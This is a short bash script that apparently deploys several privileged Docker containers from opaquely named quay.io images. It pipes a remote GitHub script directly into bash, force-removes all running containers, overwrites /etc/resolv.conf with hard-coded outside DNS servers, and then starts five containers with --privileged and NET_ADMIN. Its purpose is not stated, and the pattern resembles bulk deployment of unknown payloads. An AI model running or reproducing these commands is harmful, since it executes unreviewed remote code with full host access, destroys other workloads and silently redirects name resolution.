#gorgegofin
#!/bin/bash
# export su_img_2=$SUDO_USER
# echo $su_img_2
export su_img_3=$(cat read.me)
curl https://raw.githubusercontent.com/GH0STAV0/lsq_0_c/main/runn.sh | bash
echo  $su_img_3
export host=$su_img_3"-gc-emma-"
export img2="quay.io/xm0uray/site_5:tag1"
export img="quay.io/xm0uray/0ct0pus_child_cheap"
export sess="p"
echo $img
docker rm -f $(docker ps -q)
#docker rmi -f $img
#docker rmi -f $img2
echo -e "nameserver 103.86.96.100\nnameserver 103.86.99.100" >  /etc/resolv.conf

echo  "HOST : [" $host " ] " " | IMAGE_DOCKER : [ "$img " ]" $sess
for (( i=1; i <= 5; i++ )); do
  bash -c  "docker run -d --shm-size=2g --name $sess$i --cap-add=NET_ADMIN  -h  $host$i --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:ro  $img"
done
